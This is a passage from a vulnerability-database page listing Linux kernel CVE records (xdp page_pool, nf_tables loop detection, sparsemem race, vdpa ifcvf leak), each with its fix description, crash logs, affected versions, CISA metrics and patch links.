__pfx_mem_allocator_disconnect+0x10/0x10\n? mark_held_locks+0xa5/0xf0\n? rcu_is_watching+0x11/0xb0\npage_pool_release+0x36e/0x6d0\npage_pool_destroy+0xd7/0x440\nxdp_unreg_mem_model+0x1a7/0x2a0\n? __pfx_xdp_unreg_mem_model+0x10/0x10\n? kfree+0x125/0x370\n? bnxt_free_ring.isra.0+0x2eb/0x500\n? bnxt_free_mem+0x5ac/0x2500\nxdp_rxq_info_unreg+0x4a/0xd0\nbnxt_free_mem+0x1356/0x2500\nbnxt_close_nic+0xf0/0x3b0\n? __pfx_bnxt_close_nic+0x10/0x10\n? ethnl_parse_bit+0x2c6/0x6d0\n? __pfx___nla_validate_parse+0x10/0x10\n? __pfx_ethnl_parse_bit+0x10/0x10\nbnxt_set_features+0x2a8/0x3e0\n__netdev_update_features+0x4dc/0x1370\n? ethnl_parse_bitset+0x4ff/0x750\n? __pfx_ethnl_parse_bitset+0x10/0x10\n? __pfx___netdev_update_features+0x10/0x10\n? mark_held_locks+0xa5/0xf0\n? _raw_spin_unlock_irqrestore+0x42/0x70\n? __pm_runtime_resume+0x7d/0x110\nethnl_set_features+0x32d/0xa20\n\nTo fix this problem, it uses rhashtable_lookup_fast() instead of\nrhashtable_lookup() with rcu_read_lock().\nUsing xa without rcu_read_lock() here is safe.\nxa is freed by __xdp_mem_allocator_rcu_free() and this is called by\ncall_rcu() of mem_xa_remove().\nThe mem_xa_remove() is called by page_pool_destroy() if a reference\ncount reaches 0.\nThe xa is already protected by the reference count mechanism well in the\ncontrol plane.\nSo removing rcu_read_lock() for page_pool_destroy() is safe."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:58:09.821Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/be9d08ff102df3ac4f66e826ea935cf3af63a4bd"
},
{
"url": "https://git.kernel.org/stable/c/6c390ef198aa69795427a5cb5fd7cb4bc7e6cd7a"
},
{
"url": "https://git.kernel.org/stable/c/3fc1be360b99baeea15cdee3cf94252cd3a72d26"
},
{
"url": "https://git.kernel.org/stable/c/bf0ce5aa5f2525ed1b921ba36de96e458e77f482"
},
{
"url": "https://git.kernel.org/stable/c/12144069209eec7f2090ce9afa15acdcc2c2a537"
},
{
"url": "https://git.kernel.org/stable/c/59a931c5b732ca5fc2ca727f5a72aeabaafa85ec"
}
],
"title": "xdp: fix invalid wait context of page_pool_destroy()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-43834",
"datePublished": "2024-08-17T09:21:51.583Z",
"dateReserved": "2024-08-17T09:11:59.274Z",
"dateUpdated": "2025-05-04T12:58:09.821Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-41042 (GCVE-0-2024-41042)
Vulnerability from cvelistv5
Published
2024-07-29 14:31
Modified
2025-05-04 09:20
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
netfilter: nf_tables: prefer nft_chain_validate
nft_chain_validate already performs loop detection because a cycle will
result in a call stack overflow (ctx->level >= NFT_JUMP_STACK_SIZE).
It also follows maps via ->validate callback in nft_lookup, so there
appears no reason to iterate the maps again.
nf_tables_check_loops() and all its helper functions can be removed.
This improves ruleset load time significantly, from 23s down to 12s.
This also fixes a crash bug. Old loop detection code can result in
unbounded recursion:
BUG: TASK stack guard page was hit at ....
Oops: stack guard page: 0000 [#1] PREEMPT SMP KASAN
CPU: 4 PID: 1539 Comm: nft Not tainted 6.10.0-rc5+ #1
[..]
with a suitable ruleset during validation of register stores.
I can't see any actual reason to attempt to check for this from
nft_validate_register_store(), at this point the transaction is still in
progress, so we don't have a full picture of the rule graph.
For nf-next it might make sense to either remove it or make this depend
on table->validate_state in case we could catch an error earlier
(for improved error reporting to userspace).
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 20a69341f2d00cd042e81c82289fba8a13c05a25 Version: 20a69341f2d00cd042e81c82289fba8a13c05a25 Version: 20a69341f2d00cd042e81c82289fba8a13c05a25 Version: 20a69341f2d00cd042e81c82289fba8a13c05a25 Version: 20a69341f2d00cd042e81c82289fba8a13c05a25 Version: 20a69341f2d00cd042e81c82289fba8a13c05a25 Version: 20a69341f2d00cd042e81c82289fba8a13c05a25 Version: 20a69341f2d00cd042e81c82289fba8a13c05a25 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T04:39:56.189Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9df785aeb7dcc8efd1d4110bb27d26005298ebae"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/cff3bd012a9512ac5ed858d38e6ed65f6391008c"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-41042",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:23:10.425038Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:34:02.840Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/netfilter/nf_tables_api.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "1947e4c3346faa8ac7e343652c0fd3b3e394202f",
"status": "affected",
"version": "20a69341f2d00cd042e81c82289fba8a13c05a25",
"versionType": "git"
},
{
"lessThan": "cd4348e0a50286282c314ad6d2b0740e7c812c24",
"status": "affected",
"version": "20a69341f2d00cd042e81c82289fba8a13c05a25",
"versionType": "git"
},
{
"lessThan": "31c35f9f89ef585f1edb53e17ac73a0ca4a9712b",
"status": "affected",
"version": "20a69341f2d00cd042e81c82289fba8a13c05a25",
"versionType": "git"
},
{
"lessThan": "8246b7466c8da49d0d9e85e26cbd69dd6d3e3d1e",
"status": "affected",
"version": "20a69341f2d00cd042e81c82289fba8a13c05a25",
"versionType": "git"
},
{
"lessThan": "b6b6e430470e1c3c5513311cb35a15a205595abe",
"status": "affected",
"version": "20a69341f2d00cd042e81c82289fba8a13c05a25",
"versionType": "git"
},
{
"lessThan": "717c91c6ed73e248de6a15bc53adefb81446c9d0",
"status": "affected",
"version": "20a69341f2d00cd042e81c82289fba8a13c05a25",
"versionType": "git"
},
{
"lessThan": "9df785aeb7dcc8efd1d4110bb27d26005298ebae",
"status": "affected",
"version": "20a69341f2d00cd042e81c82289fba8a13c05a25",
"versionType": "git"
},
{
"lessThan": "cff3bd012a9512ac5ed858d38e6ed65f6391008c",
"status": "affected",
"version": "20a69341f2d00cd042e81c82289fba8a13c05a25",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/netfilter/nf_tables_api.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.13"
},
{
"lessThan": "3.13",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.320",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.282",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.224",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.165",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.105",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.46",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.10",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.320",
"versionStartIncluding": "3.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.282",
"versionStartIncluding": "3.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.224",
"versionStartIncluding": "3.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.165",
"versionStartIncluding": "3.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.105",
"versionStartIncluding": "3.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.46",
"versionStartIncluding": "3.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.10",
"versionStartIncluding": "3.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "3.13",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nf_tables: prefer nft_chain_validate\n\nnft_chain_validate already performs loop detection because a cycle will\nresult in a call stack overflow (ctx-\u003elevel \u003e= NFT_JUMP_STACK_SIZE).\n\nIt also follows maps via -\u003evalidate callback in nft_lookup, so there\nappears no reason to iterate the maps again.\n\nnf_tables_check_loops() and all its helper functions can be removed.\nThis improves ruleset load time significantly, from 23s down to 12s.\n\nThis also fixes a crash bug. Old loop detection code can result in\nunbounded recursion:\n\nBUG: TASK stack guard page was hit at ....\nOops: stack guard page: 0000 [#1] PREEMPT SMP KASAN\nCPU: 4 PID: 1539 Comm: nft Not tainted 6.10.0-rc5+ #1\n[..]\n\nwith a suitable ruleset during validation of register stores.\n\nI can\u0027t see any actual reason to attempt to check for this from\nnft_validate_register_store(), at this point the transaction is still in\nprogress, so we don\u0027t have a full picture of the rule graph.\n\nFor nf-next it might make sense to either remove it or make this depend\non table-\u003evalidate_state in case we could catch an error earlier\n(for improved error reporting to userspace)."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:20:46.322Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/1947e4c3346faa8ac7e343652c0fd3b3e394202f"
},
{
"url": "https://git.kernel.org/stable/c/cd4348e0a50286282c314ad6d2b0740e7c812c24"
},
{
"url": "https://git.kernel.org/stable/c/31c35f9f89ef585f1edb53e17ac73a0ca4a9712b"
},
{
"url": "https://git.kernel.org/stable/c/8246b7466c8da49d0d9e85e26cbd69dd6d3e3d1e"
},
{
"url": "https://git.kernel.org/stable/c/b6b6e430470e1c3c5513311cb35a15a205595abe"
},
{
"url": "https://git.kernel.org/stable/c/717c91c6ed73e248de6a15bc53adefb81446c9d0"
},
{
"url": "https://git.kernel.org/stable/c/9df785aeb7dcc8efd1d4110bb27d26005298ebae"
},
{
"url": "https://git.kernel.org/stable/c/cff3bd012a9512ac5ed858d38e6ed65f6391008c"
}
],
"title": "netfilter: nf_tables: prefer nft_chain_validate",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-41042",
"datePublished": "2024-07-29T14:31:55.530Z",
"dateReserved": "2024-07-12T12:17:45.624Z",
"dateUpdated": "2025-05-04T09:20:46.322Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52489 (GCVE-0-2023-52489)
Vulnerability from cvelistv5
Published
2024-02-29 15:52
Modified
2025-05-04 07:37
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
mm/sparsemem: fix race in accessing memory_section->usage
The below race is observed on a PFN which falls into the device memory
region with the system memory configuration where PFN's are such that
[ZONE_NORMAL ZONE_DEVICE ZONE_NORMAL]. Since normal zone start and end
pfn contains the device memory PFN's as well, the compaction triggered
will try on the device memory PFN's too though they end up in NOP(because
pfn_to_online_page() returns NULL for ZONE_DEVICE memory sections). When
from other core, the section mappings are being removed for the
ZONE_DEVICE region, that the PFN in question belongs to, on which
compaction is currently being operated is resulting into the kernel crash
with CONFIG_SPASEMEM_VMEMAP enabled. The crash logs can be seen at [1].
compact_zone() memunmap_pages
------------- ---------------
__pageblock_pfn_to_page
......
(a)pfn_valid():
valid_section()//return true
(b)__remove_pages()->
sparse_remove_section()->
section_deactivate():
[Free the array ms->usage and set
ms->usage = NULL]
pfn_section_valid()
[Access ms->usage which
is NULL]
NOTE: From the above it can be said that the race is reduced to between
the pfn_valid()/pfn_section_valid() and the section deactivate with
SPASEMEM_VMEMAP enabled.
The commit b943f045a9af("mm/sparse: fix kernel crash with
pfn_section_valid check") tried to address the same problem by clearing
the SECTION_HAS_MEM_MAP with the expectation of valid_section() returns
false thus ms->usage is not accessed.
Fix this issue by the below steps:
a) Clear SECTION_HAS_MEM_MAP before freeing the ->usage.
b) RCU protected read side critical section will either return NULL
when SECTION_HAS_MEM_MAP is cleared or can successfully access ->usage.
c) Free the ->usage with kfree_rcu() and set ms->usage = NULL. No
attempt will be made to access ->usage after this as the
SECTION_HAS_MEM_MAP is cleared thus valid_section() return false.
Thanks to David/Pavan for their inputs on this patch.
[1] https://lore.kernel.org/linux-mm/994410bb-89aa-d987-1f50-f514903c55aa@quicinc.com/
On Snapdragon SoC, with the mentioned memory configuration of PFN's as
[ZONE_NORMAL ZONE_DEVICE ZONE_NORMAL], we are able to see bunch of
issues daily while testing on a device farm.
For this particular issue below is the log. Though the below log is
not directly pointing to the pfn_section_valid(){ ms->usage;}, when we
loaded this dump on T32 lauterbach tool, it is pointing.
[ 540.578056] Unable to handle kernel NULL pointer dereference at
virtual address 0000000000000000
[ 540.578068] Mem abort info:
[ 540.578070] ESR = 0x0000000096000005
[ 540.578073] EC = 0x25: DABT (current EL), IL = 32 bits
[ 540.578077] SET = 0, FnV = 0
[ 540.578080] EA = 0, S1PTW = 0
[ 540.578082] FSC = 0x05: level 1 translation fault
[ 540.578085] Data abort info:
[ 540.578086] ISV = 0, ISS = 0x00000005
[ 540.578088] CM = 0, WnR = 0
[ 540.579431] pstate: 82400005 (Nzcv daif +PAN -UAO +TCO -DIT -SSBSBTYPE=--)
[ 540.579436] pc : __pageblock_pfn_to_page+0x6c/0x14c
[ 540.579454] lr : compact_zone+0x994/0x1058
[ 540.579460] sp : ffffffc03579b510
[ 540.579463] x29: ffffffc03579b510 x28: 0000000000235800 x27:000000000000000c
[ 540.579470] x26: 0000000000235c00 x25: 0000000000000068 x24:ffffffc03579b640
[ 540.579477] x23: 0000000000000001 x22: ffffffc03579b660 x21:0000000000000000
[ 540.579483] x20: 0000000000235bff x19: ffffffdebf7e3940 x18:ffffffdebf66d140
[ 540.579489] x17: 00000000739ba063 x16: 00000000739ba063 x15:00000000009f4bff
[ 540.579495] x14: 0000008000000000 x13: 0000000000000000 x12:0000000000000001
[ 540.579501] x11: 0000000000000000 x10: 0000000000000000 x9 :ffffff897d2cd440
[ 540.579507] x8 : 0000000000000000 x7 : 0000000000000000 x6 :ffffffc03579b5b4
[ 540.579512] x5 : 0000000000027f25 x4 : ffffffc03579b5b8 x3 :0000000000000
---truncated---
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: f46edbd1b1516da1fb34c917775168d5df576f78 Version: f46edbd1b1516da1fb34c917775168d5df576f78 Version: f46edbd1b1516da1fb34c917775168d5df576f78 Version: f46edbd1b1516da1fb34c917775168d5df576f78 Version: f46edbd1b1516da1fb34c917775168d5df576f78 Version: f46edbd1b1516da1fb34c917775168d5df576f78 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52489",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-03-12T14:56:15.828991Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:22:46.560Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T23:03:20.387Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/90ad17575d26874287271127d43ef3c2af876cea"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b448de2459b6d62a53892487ab18b7d823ff0529"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/68ed9e33324021e9d6b798e9db00ca3093d2012a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/70064241f2229f7ba7b9599a98f68d9142e81a97"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3a01daace71b521563c38bbbf874e14c3e58adb7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5ec8e8ea8b7783fab150cf86404fc38cb4db8800"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"include/linux/mmzone.h",
"mm/sparse.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "90ad17575d26874287271127d43ef3c2af876cea",
"status": "affected",
"version": "f46edbd1b1516da1fb34c917775168d5df576f78",
"versionType": "git"
},
{
"lessThan": "b448de2459b6d62a53892487ab18b7d823ff0529",
"status": "affected",
"version": "f46edbd1b1516da1fb34c917775168d5df576f78",
"versionType": "git"
},
{
"lessThan": "68ed9e33324021e9d6b798e9db00ca3093d2012a",
"status": "affected",
"version": "f46edbd1b1516da1fb34c917775168d5df576f78",
"versionType": "git"
},
{
"lessThan": "70064241f2229f7ba7b9599a98f68d9142e81a97",
"status": "affected",
"version": "f46edbd1b1516da1fb34c917775168d5df576f78",
"versionType": "git"
},
{
"lessThan": "3a01daace71b521563c38bbbf874e14c3e58adb7",
"status": "affected",
"version": "f46edbd1b1516da1fb34c917775168d5df576f78",
"versionType": "git"
},
{
"lessThan": "5ec8e8ea8b7783fab150cf86404fc38cb4db8800",
"status": "affected",
"version": "f46edbd1b1516da1fb34c917775168d5df576f78",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"include/linux/mmzone.h",
"mm/sparse.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.3"
},
{
"lessThan": "5.3",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.210",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.149",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.76",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.15",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.210",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.149",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.76",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.15",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.3",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "5.3",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmm/sparsemem: fix race in accessing memory_section-\u003eusage\n\nThe below race is observed on a PFN which falls into the device memory\nregion with the system memory configuration where PFN\u0027s are such that\n[ZONE_NORMAL ZONE_DEVICE ZONE_NORMAL]. Since normal zone start and end\npfn contains the device memory PFN\u0027s as well, the compaction triggered\nwill try on the device memory PFN\u0027s too though they end up in NOP(because\npfn_to_online_page() returns NULL for ZONE_DEVICE memory sections). When\nfrom other core, the section mappings are being removed for the\nZONE_DEVICE region, that the PFN in question belongs to, on which\ncompaction is currently being operated is resulting into the kernel crash\nwith CONFIG_SPASEMEM_VMEMAP enabled. The crash logs can be seen at [1].\n\ncompact_zone()\t\t\tmemunmap_pages\n-------------\t\t\t---------------\n__pageblock_pfn_to_page\n ......\n (a)pfn_valid():\n valid_section()//return true\n\t\t\t (b)__remove_pages()-\u003e\n\t\t\t\t sparse_remove_section()-\u003e\n\t\t\t\t section_deactivate():\n\t\t\t\t [Free the array ms-\u003eusage and set\n\t\t\t\t ms-\u003eusage = NULL]\n pfn_section_valid()\n [Access ms-\u003eusage which\n is NULL]\n\nNOTE: From the above it can be said that the race is reduced to between\nthe pfn_valid()/pfn_section_valid() and the section deactivate with\nSPASEMEM_VMEMAP enabled.\n\nThe commit b943f045a9af(\"mm/sparse: fix kernel crash with\npfn_section_valid check\") tried to address the same problem by clearing\nthe SECTION_HAS_MEM_MAP with the expectation of valid_section() returns\nfalse thus ms-\u003eusage is not accessed.\n\nFix this issue by the below steps:\n\na) Clear SECTION_HAS_MEM_MAP before freeing the -\u003eusage.\n\nb) RCU protected read side critical section will either return NULL\n when SECTION_HAS_MEM_MAP is cleared or can successfully access -\u003eusage.\n\nc) Free the -\u003eusage with kfree_rcu() and set ms-\u003eusage = NULL. No\n attempt will be made to access -\u003eusage after this as the\n SECTION_HAS_MEM_MAP is cleared thus valid_section() return false.\n\nThanks to David/Pavan for their inputs on this patch.\n\n[1] https://lore.kernel.org/linux-mm/994410bb-89aa-d987-1f50-f514903c55aa@quicinc.com/\n\nOn Snapdragon SoC, with the mentioned memory configuration of PFN\u0027s as\n[ZONE_NORMAL ZONE_DEVICE ZONE_NORMAL], we are able to see bunch of\nissues daily while testing on a device farm.\n\nFor this particular issue below is the log. Though the below log is\nnot directly pointing to the pfn_section_valid(){ ms-\u003eusage;}, when we\nloaded this dump on T32 lauterbach tool, it is pointing.\n\n[ 540.578056] Unable to handle kernel NULL pointer dereference at\nvirtual address 0000000000000000\n[ 540.578068] Mem abort info:\n[ 540.578070] ESR = 0x0000000096000005\n[ 540.578073] EC = 0x25: DABT (current EL), IL = 32 bits\n[ 540.578077] SET = 0, FnV = 0\n[ 540.578080] EA = 0, S1PTW = 0\n[ 540.578082] FSC = 0x05: level 1 translation fault\n[ 540.578085] Data abort info:\n[ 540.578086] ISV = 0, ISS = 0x00000005\n[ 540.578088] CM = 0, WnR = 0\n[ 540.579431] pstate: 82400005 (Nzcv daif +PAN -UAO +TCO -DIT -SSBSBTYPE=--)\n[ 540.579436] pc : __pageblock_pfn_to_page+0x6c/0x14c\n[ 540.579454] lr : compact_zone+0x994/0x1058\n[ 540.579460] sp : ffffffc03579b510\n[ 540.579463] x29: ffffffc03579b510 x28: 0000000000235800 x27:000000000000000c\n[ 540.579470] x26: 0000000000235c00 x25: 0000000000000068 x24:ffffffc03579b640\n[ 540.579477] x23: 0000000000000001 x22: ffffffc03579b660 x21:0000000000000000\n[ 540.579483] x20: 0000000000235bff x19: ffffffdebf7e3940 x18:ffffffdebf66d140\n[ 540.579489] x17: 00000000739ba063 x16: 00000000739ba063 x15:00000000009f4bff\n[ 540.579495] x14: 0000008000000000 x13: 0000000000000000 x12:0000000000000001\n[ 540.579501] x11: 0000000000000000 x10: 0000000000000000 x9 :ffffff897d2cd440\n[ 540.579507] x8 : 0000000000000000 x7 : 0000000000000000 x6 :ffffffc03579b5b4\n[ 540.579512] x5 : 0000000000027f25 x4 : ffffffc03579b5b8 x3 :0000000000000\n---truncated---"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T07:37:51.825Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/90ad17575d26874287271127d43ef3c2af876cea"
},
{
"url": "https://git.kernel.org/stable/c/b448de2459b6d62a53892487ab18b7d823ff0529"
},
{
"url": "https://git.kernel.org/stable/c/68ed9e33324021e9d6b798e9db00ca3093d2012a"
},
{
"url": "https://git.kernel.org/stable/c/70064241f2229f7ba7b9599a98f68d9142e81a97"
},
{
"url": "https://git.kernel.org/stable/c/3a01daace71b521563c38bbbf874e14c3e58adb7"
},
{
"url": "https://git.kernel.org/stable/c/5ec8e8ea8b7783fab150cf86404fc38cb4db8800"
}
],
"title": "mm/sparsemem: fix race in accessing memory_section-\u003eusage",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52489",
"datePublished": "2024-02-29T15:52:08.718Z",
"dateReserved": "2024-02-20T12:30:33.302Z",
"dateUpdated": "2025-05-04T07:37:51.825Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-48706 (GCVE-0-2022-48706)
Vulnerability from cvelistv5
Published
2024-05-21 15:22
Modified
2025-05-04 08:21
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
vdpa: ifcvf: Do proper cleanup if IFCVF init fails
ifcvf_mgmt_dev leaks memory if it is not freed before
returning. Call is made to correct return statement
so memory does not leak. ifcvf_init_hw does not take
care of this so it is needed to do it here.
References
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2022-48706",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-17T17:37:11.513272Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-17T17:37:51.673Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-03T15:17:55.751Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5d2cc32c1c10bd889125d2adc16a6bc3338dcd3e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6b04456e248761cf68f562f2fd7c04e591fcac94"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/vdpa/ifcvf/ifcvf_main.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "5d2cc32c1c10bd889125d2adc16a6bc3338dcd3e",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
